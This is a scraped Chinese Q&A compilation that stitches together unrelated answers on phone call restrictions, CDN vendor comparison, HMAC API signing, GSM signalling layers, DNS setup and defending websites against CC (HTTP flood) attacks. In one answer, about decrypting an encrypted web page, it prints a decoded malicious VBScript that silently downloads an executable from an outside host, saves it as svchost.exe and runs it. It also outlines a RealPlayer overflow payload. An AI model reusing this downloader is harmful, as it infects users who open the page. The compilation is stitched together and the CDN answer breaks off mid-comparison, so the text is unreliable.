A. 為什麼我的手機打電話出去提示的是「您沒有開通此項業務......」
一、解決方法如下
手機設置呼叫限制或調試某個功能,如果沒有的話將卡放其他手機中試試,看能不能正常使用,這樣可判斷是否是手機或卡的問題。
解決方法:
第一,查手機設置原因,一般在手機的"通話設置"或"手機設置"菜單上設置了限制呼出或線路選擇2引起的,只要進入相應的菜單取消限制呼出或將線路2改為線路1即可.
第二,可能是手機軟體故障,可先關機開機後試撥打電話看看.
第三,如與手機無關,請撥打客服反映網路問題.
(參考資料:網路:手機號碼)
B. 騰訊雲cdn和阿里雲cdn哪個好
如今,對於我們用戶而言可以選擇的國內、國外主機服務商、雲主機產品越來越多,成本也越來越低。國內主流的BAT也都有提供相應的雲主機產品服務(網路雲BCC、騰訊雲CVM、阿里雲ECS)。在雲伺服器服務之外,還會提供與之相關聯的其他雲服務,比如存儲、資料庫、安全、監控工具等等。
如今各大中型網站都會啟用內容分發網路CDN加速服務,通過CDN服務商網路節點,更友好、更快速地展現網站項目和服務,進而提高網站友好度。
在這篇文章,將會針對當前網路雲(cloud..com)、騰訊雲(qcloud.com)、阿里雲(aliyun.com)三家國內雲主機提供商,對比各自CDN服務的優勢、特點。進而可以方便我們用戶選擇需要的服務。
第一、是否免費
對於用戶而言,我們更希望商家能夠提供免費服務,我們也能夠從網上看到一些商家提供的免費CDN服務,大部分商家免費與付費還是有一定的區別的,比如節點、速度、以及其他增值功能區別。當然,對於一般網站來說,開始使用免費服務也是可取的,但是隨著項目的升級、收入的增加,我們最終還是需要使用付費服務來保障服務的質量。
1、網路雲CDN
以上對阿里雲CDN和騰訊雲CDN部署實例後,利用17CE在線工具進行的簡單國內電信、移動、聯通、以及海外節點的測速數據。以上數據僅僅是當前工具節點的速度體現,實際上會因為具體項目、DNS解析,實際用戶真實節點等因素會有所差異。
第五、BAT三家CDN服務小結
由於各自業務重心不同,起步稍有早晚區別,但是可以看到這兩年各家在雲主機業務上也在陸續增設部署。
1、從官方界面看,騰訊雲官網界面給個人的感覺比較好看,以前覺得阿里還不錯的,但是由於產品增多,無論是前台和後台的產品菜單布局顯得有點亂,有些時候找個菜單不知道在哪裡。
2、從免費流量看,騰訊雲CDN無疑是新用戶最佳選擇商家,新用戶前6個月每月提供50GB流量,而且自開通之日起每月可以額外贈送10GB。也就是說,如果以後項目流量不超過10GB/月,那就可以一直免費使用。
C. 網頁源文件被加密,怎麼解密~~~
第一個加密就是利用VBScript...
解密出來的內容就是這個...
on error resume next
dim Dataspace,XMLHTTP,Stream,FileSystemObject,FolderObject,ApplicationObject
dim Path,BBS
Set Dataspace = document.createElement("object")
Dataspace.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set XMLHTTP = Dataspace.CreateObject("Microsoft.XMLHTTP","")
set Stream = Dataspace.createobject("Adodb.Stream","")
set FileSystemObject = Dataspace.createobject("Scripting.FileSystemObject","")
set FolderObject = FileSystemObject.GetSpecialFolder(2)
set ApplicationObject = Dataspace.createobject("Shell.Application","")
Path= FileSystemObject.BuildPath(FolderObject,"svchost.exe")
Stream.type = 1
XMLHTTP.Open "GET","http://bbb.ehai01.com/0.exe", False
XMLHTTP.Send
Stream.open
Stream.write XMLHTTP.responseBody
Stream.savetofile Path,2
Stream.close
ApplicationObject.ShellExecute Path,BBS,BBS,"open",0
第二個網頁
先得到當前real的版本,然後把版本信息和shell信息放在PayLoad中
再把PayLoad載入到c:\\Program Files\\NetMeeting\\TestSnd.wav後面,然後利用溢出去執行Shell裡面的內容,那個裡面的內容..應該是用Base64加的密,但是因為Shell裡面存儲的是程序,所以直接解密出來是亂碼....實際上那段亂碼就是一個exe文件...代碼是看不到的...直接看的話就像是用記事本打開一個exe文件一樣的效果...
D. 內部微服務系統之間調用是否需要安全認證嗎
想要為開發工程師們開發一個既能滿足REST約束條件和原則又不像OAuth OAuth 那樣復雜 the complexity ,僅僅使用簡單的傳值語句或者其它簡單但同樣安全的方法就能實現的web API? 聰明人會有聰明的想法… 問題 直接通過HTTP literally passing the credentials over HTTP以文本方式傳輸鑒權信息可能會被破譯; 尤其在 Gawker incident, 再以文本或是弱加密的方式傳輸鑒權信息是非常不安全的做法 weakly-hashed anything is usually a bad idea. 即便是使用哈希加密後還是很有可能被人根據彩虹表 Rainbow Table破譯出與用戶名匹配的密碼(個別案例) 這可該怎麼辦,真是郁悶… 也許你又會想到很多公共的API popular public APIs在請求中採用雙數據的模式:一個公有值一個(最好是有)只有屬主能訪問的私有值。 」還是有點不對!」這不跟原來(用戶名密碼模式)文本模式差不多麼,還是可能會被(嗅探器)破譯。 這時候你可能准備放棄並採用OAuth模式了,但仍堅信必有某種簡單方法能實現公用webAPI安全訪問私有鑒權信息。 解決方案 連續2天的Peyote實驗後(你可能會找到更好的放鬆辦法),結論終於呈現在你眼前:Amazon是擁有最大的、使用最多的在線網路API的網路服務之一,並且根本不支持OAuth! 經過一個下午長時間的狂想之後,你最終敗下陣來,並看到Amazon是如何保持API請求安全的。你不清楚為什麼,但讀完整頁關於如何為Amazon網路服務裝配一個請求後,你依然覺得不完全合理。這個「簽名」和什麼連在一起?代碼示例中的「data」參數是什麼?這樣,你會繼續查找關於「安全API設計」的文章。。。 當遇到其他人問同樣的問題時,你看到一些指出"HMAC"或其他事物的優秀回復,但還是不太確定。 你找到其他鼓勵你使用「HMAC」的文章並且你正H-FINE地使用它,如果有人將「HMAC」解釋成簡明的H_ENGLISH的話。 你的確偶遇了一個有道理的蒸餾的基本概念,它是這樣一簡明的英語描述的: 一個伺服器和客戶端知道一個公鑰和一個私鑰;只有伺服器和客戶端知道私鑰,但每個人都知道公鑰。。。但不關心別人所知道的。 一個客戶端生成一個唯一的HMAC(哈希)表示它到伺服器的請求。通過把請求數據(參數和值或XML/JSON或任何它計劃發送的數據)以及請求數據的散列blob和私鑰結合來實現。 客戶端隨後將這個HASH以及所有它將要發送的參數和值一並發給伺服器。 伺服器接到請求,並使用與客戶端相同的方式重新生成自己獨有的基於提交值的HMAC(哈希)。 然後,伺服器比較這兩個HMAC,如果相同,伺服器就信任這個客戶端並執行請求。 這似乎很直截了當。最初讓你困惑的是,你以為原始請求是經過加密傳送的,但實際上,HMAC方法所做的一切只是使用只有客戶端和伺服器才知道的私鑰將參數生成為一些獨特的校驗和(哈希)。 隨後,客戶端將這個校驗和及原始參數和值發給伺服器,然後伺服器復核校驗和(哈希)以確定它接受客戶端所發的請求。 因為根據假設,只有在客戶端和伺服器知道私鑰,我們假設如果他們的哈希匹配,那麼它們會互相信任,以至伺服器隨即正常處理這個請求。 你知道在現實中,這就相當於某人過來對你說:「Jimmy讓我告訴你把錢給Johnny」,但你不知道這個人是誰,所以你要伸出手去試探他,看看他是否知道這個秘密握手。 如果三次握手證明無誤,則通訊繼續進行,否則中斷通訊。. 你明白了大概是怎麼回事,但還是想會不會還有更好的方法呢?還好,有tarsnap網站 tarsnap幫你答疑解惑。看看亞馬遜是如何解決簽名認證問題的Amazon screwed this up with Signature Version 1. 看完了亞馬遜的web service是如何鑒權的,re-read how Amazon Web Services does authentication 講的確實有道理,整個流程如下: [客戶端]在調用REST API之前,首先將待發送消息體打包, combine a bunch of unique data together(websevice端將要接收的數據) [客戶端]用系統分派的密鑰使用哈希(最好是HMAC-SHA1 or SHA256 ) 加密(第一步的數據). [客戶端]向伺服器發送數據: 用戶身份認證信息例如,用戶ID,客戶ID或是其他能別用戶身份的信息。這是公共API,大家都能訪問的到(自然也包括了那些居心叵測的訪問者)系統僅僅需要這部分信息來區分發信人而不考慮可靠與否(當然可以通過HMAC來判斷可靠性). 發送生成的HMAC碼. 發送消息體(屬性名和屬性值),如果是私有信息需要加密,像是(「mode=start&number=4&order=desc」或其他不重要的信息)直接發送即可. (可選項)避免重放攻擊 「replay attacks」 o的唯一辦法就是加上時間戳。在使用HMAC演算法時加入時間戳,這樣系統就能依據一定的條件去驗證是否有重放的請求並拒絕. [伺服器端]接收客戶端發來的消息. [伺服器端] (參看可選項)檢查接收時間和發送時間的間隔是否在允許范圍內(5-15分)以避免重放攻擊replay attacks. 提示: 確保待檢對象的時區無誤daylight savings time 更新: 最近得到的結論就是直接使用UTC時區而無需考慮DST的問題 use UTC time . [伺服器端]使用發送請求中用戶信息(比如.API值)從資料庫檢索出對應的私匙. [伺服器端] 跟客戶端相同,先將消息體打包然後用剛得到的私匙加密(生成HMAC)消息體. (參看可選項) 如果你使用了加入時間戳的方式避免重放攻擊,請確保服務端生成的加密信息中擁有和客戶端相同的時間戳信息以避免中間人攻擊man-in-the-middle attack. [伺服器端] 就像在客戶端一樣,使用HMAC哈希加密剛才的信息體. [伺服器端] 將伺服器端剛生成的哈希與客戶端的對比。如果一致,則通訊繼續;否則,拒絕請求! 提示: 在打包消息體的時候一定要考慮清楚,如果像亞馬遜進行簽名版本1中信息識別那樣會面臨哈希沖突的問題 open yourself up to hash-collisions! (建議:將整個包含URL的請求加密即可!) 特別提示:私匙絕對不能在通訊過程中傳遞,它僅僅用來生成HMAC,伺服器端會自動查詢出它的私匙並重新生成自己的HMAC.我來翻譯公匙僅僅用來區分不同的用戶,即使被破解也無所謂。因為此時的消息無需判斷其可靠性,服務端和客戶端還是要通過私匙來加密(比如,前綴、後綴,倍數等等) 10/13/11更新:Chris最近發現 pointed out 如果在HMAC計算中加入了URI或是HTTP請求/回復,攻擊者更易通過更改末端或是HTTP方法來搞破壞。比如,在HTTP POST方法中將/issue/create改成/user/delete。
E. 如何防禦網站cc攻擊
您好,很高興為您解答。
一般避免CC攻擊的辦法有幾種,一個是經過防火牆;
從原理上看,基本上所有的防火牆都會檢查並發的TCP/IP銜接數目,超過必定數目必定頻率就會被認為是Connection-Flood。但假如IP的數量足夠大,使得單個IP的銜接數較少,那麼防火牆未必能阻撓CC攻擊。
由於CC攻擊畢竟是經過程序來抓取頁面,與一般閱讀者的特性差異仍是很大的,例如一般閱讀者拜訪一個頁面,必定會接連抓取頁面的HTML文件、CSS文件、JS文件和圖片等一系列有關文件,而CC攻擊者只是只會抓取一個URL地址的文件,不會抓取別的類型的文件,其User Agent也大部分和一般閱讀者不一樣,這就能夠在伺服器上很簡略分辨出哪些拜訪者是CC攻擊了,已然能夠判別出攻擊者的IP,那麼避免措施就很簡略,只需要批量將這些IP屏蔽,即可到達防備CC攻擊的意圖。
F. RR層MM層和CC層都是什麼意思
CC層的主要功能為建立、維持和釋放呼叫;MM層的功能主要為位置管理—通信RR層的主要功能為在無線介面上管理傳輸路徑及切換。呼叫流程分為:通話建立、呼叫釋放、位置更新、呼叫重建和DTMF協議控制。分別從RR、MM、CC三層中以通話建立(手機作主叫)為例:首先是RR層連接的建立:手機通過RACH(隨即接入信道)上行發送channel request信令,發送建立的原因(起呼、緊急呼叫、呼叫重建和尋呼響應等)和隨機參考值(RAND);BSC通過AGCH(接入運行信道)發送immediate assignment(立即指派),在Um介面建立MS與系統間的無線連接,分配SDCCH。至此,RR連接建立。MM層連接的建立:MS上行通過CCCH發送CM service request,請求業務(如電路交換連接、短線業務等);移動交換中心通過SDCCH下行發送auth request(鑒權請求);MS通過SDCCH上行發送auth response(鑒權響應);交換中心通過SDCCH下行發送 ciphering request (加密命令);MS在SDCCH上行發送 ciphering complete (加密完成)。至此,MM層建立完成。CC層連接的建立(CC層開始使用的都是SDCCH信道):手機上行發送set up (呼叫請求),請求內容為呼叫請求的業務種類以及MS發送方式、編碼保准等;交換中心下行發送call confirmed (呼叫確認)並下行發送alerting (振鈴),MSC發送提醒消息給BSS,如果MS收到提醒消息,就應當接通話音通路,此時主叫用戶可以聽到振鈴聲,表示被叫用戶正在振鈴;MSC通過BSS發送connect(連接)消息給MS,表示連接證實消息,停止所有本地產生的振鈴指示,進入「激活」狀態;BTS進一步把收到的消息assigment command發送給MS,分配TCH, 然後MSàBTSàBSCàMSC (FACCH)把assigment complete由移動台發送給網路以指示移動台已成功建立主信令鏈路,BSS證實MSC獲取信道,通知MS此時釋放SDCCH,使用TCH 信道,並下行發送connect acknowledge連接確認,表示網路接收連接。至此,CC層建立,通話開始建立。
G. 怎麼判斷網站被cc攻擊了被攻擊怎麼解決
如何判斷網站是否處於被CC攻擊的狀態下呢?這里提一下三種常見的方法
1、如果網站是動態網站,比如asp/asp.net/php等,在被CC攻擊的情況下,IIS站點會出錯提示SERVERISTOOBUSY,如果不是使用IIS來提供網站服務,會發現提供網站服務的程序無緣無故自動崩潰,出錯。如果網站程序沒有問題,基本上可以斷定是網站被CC攻擊了。
2、如果網站是靜態站點,比如html頁面,在被CC攻擊的情況下,打開任務管理器,看網路流量,會發現網路應用里數據的發送出現嚴重偏高的現象,在大量的CC攻擊下,甚至會達到99%的網路佔用,當然,在被CC攻擊的情況下網站是沒辦法正常訪問的,但是通過3389連接伺服器還是可以正常連接。
3、如果是被小量CC攻擊,則站點還是可以間歇性訪問得到,但是一些比較大的文件,比如圖片會出現顯示不出來的現象。如果是動態網站被小量CC攻擊,還會發現伺服器的CPU佔用率出現飆升的現象。這是最基本的CC攻擊症狀。
網站被攻擊是一件十分讓人惱火的事情,不僅僅是讓網站速度變慢、訪問異常,往往還會導致網站關鍵詞排名下降甚至被降權,極大幹擾了網站的正常穩定運行。
防禦CC攻擊可以通過多種方法,禁止網站代理訪問,盡量將網站做成靜態頁面,限制連接數量,修改最大超時時間等,也可以通過給伺服器裝防火牆軟體,如安全狗、雲鎖等,也或者購買WAF雲防火牆、高防IP、高防CDN。相關鏈接
H. cc域名解析怎麼設置
域名解析也叫域名指向、伺服器設置、域名配置以及反向IP登記等等,就是把由主機名,如www,字母,數字及連字元等構成的網址解析成32位的IP地址, 如202.100.222.10, 或把網址指向網址等。 解析到IP,如將www.abc.com 指向202.108.32.88; 解析到網址,如將www.abc.com指向202.108.32.88;
I. 網站被人cc攻擊了怎麼處理
CC攻擊是目前國際上攻擊成本最低的一種方式,往往黑客只需要一個簡單的CC攻擊軟體就可以對一個小型網站造成嚴重的損失,輕的打開慢,卡,嚴重的會使網站伺服器直接卡死。因為CC攻擊成本低,所以CC攻擊是目前國內最常見的攻擊方式。
簡單的CC攻擊往往是通過多個代理IP對網站進行大量請求,從而導致伺服器資源占滿,引起網站卡死,這類攻擊防禦起來非常簡單,一般的防火牆如安全狗都是可以防護的,只需要對IP訪問頻率進行限制即可。
但如果黑客的代理IP較多,那就很難防了,因為對方一個IP可以設置成一分鍾訪問一次或者幾十秒請求一次,這個頻率基本上和正常用戶一樣了,防火牆是無法進行攔截了。
有些防火牆可以通過User-Agent過濾,即過濾某些瀏覽器、蜘蛛請求,但這很容易誤傷,而且很多攻擊都是使用正常瀏覽器請求的,所以並不能有效解決CC攻擊問題。
那麼如何有效解決CC攻擊呢?
主機吧這里推薦使用網路雲加速高防CDN進行防護,網路雲加速不僅可以有效防護DDoS攻擊,同時對CC攻擊防護也是非常有效果。網路雲加速提供四到七層的DDoS攻擊防護,包括CC、SYN
flood、UDP flood等所有DDoS攻擊方式,
通過分布式高性能防火牆+精準流量清洗+CC防禦+WEB攻擊攔截,組合過濾精確識別,有效防禦各種類型攻擊。
接入網路雲加速後即可使用以下功能進行防護攔截。
WAF篇
WAF(Web Application
Firewall)網站應用防火牆,簡單點講,就是保護您網站避免被入侵的一套防火牆系統。雲加速的防火牆規則由國內頂尖的雲加速安全團隊制定,能防禦市面上超過99%常見的SQL注入、XSS、Web伺服器漏洞、應用程序漏洞以及文件訪問控制等等系列的滲透攻擊,有效的避免您的網站遭到入侵。
下面為WAF選擇展開後的功能界面:
停用海外節點 停止對該域名分配海外服務節點
超級清洗中心 使用企業級雲清洗中心服務,更快更穩定,在被攻擊情況下開啟
海外IP防護 一鍵開啟或停止對海外IP的訪問啟用防護策略
設置IP訪問頻率 設置單個IP的訪問頻率,超出限制後需通過驗證才能繼續訪問
源站保護 設置訪問源站頻率的閾值,超出後站點全部流量需要通過驗證後才能繼續訪問
URL黑名單 系統將對已添加的url的訪問啟用驗證
轉自:網頁鏈接